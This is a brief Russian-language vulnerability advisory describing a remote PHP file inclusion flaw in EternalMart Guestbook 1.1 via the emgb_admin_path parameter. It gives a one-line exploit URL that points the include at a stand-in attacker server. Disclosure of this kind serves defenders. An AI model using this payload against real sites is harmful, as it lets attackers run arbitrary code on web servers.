Программа: EternalMart Guestbook 1.1 

Уязвимость обнаружена в EternalMart Guestbook. Злонамеренный пользователь может выполнить произвольный PHP код на системе.
Сценарий "auth_func.php" не проверяет местоположение PHP файла, включаемого в переменной "emgb_admin_path". В результате удаленный пользователь может заставить сервер включить и выполнить произвольный PHP код на системе с привилегиями Web сервера. 

Пример/Эксплоит:

/admin/auth.php?emgb_admin_path=http://[evil_server]

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии